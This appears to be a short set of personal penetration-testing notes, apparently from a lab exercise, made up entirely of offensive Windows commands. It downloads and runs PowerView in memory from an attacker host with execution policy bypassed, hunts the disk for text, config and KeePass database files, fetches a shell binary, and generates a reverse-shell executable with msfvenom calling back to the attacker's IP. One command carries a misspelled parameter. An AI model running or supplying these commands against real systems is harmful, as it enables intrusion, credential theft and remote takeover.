powershell -ep bypass{ iex "& { $(irm http://192.168.45.233:8000/powerview.ps1) } RunJob" }

Get-ChildItem -Path C:\Windows -Include *.txt,*.ini -File -Recurse -ErrorAction SilentyCotinue

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\users -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Invoke-WebRequest -Uri "http://192.168.45.233:8000/shell-x64.exe" -OutFile "shell-x64.exe"
Invoke-WebRequest -Uri "http://192.168.45.233:8000/powerview.ps1" -OutFile "powerview.ps1"


msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.233 LPORT=1234 -f exe > shell-x64.exe
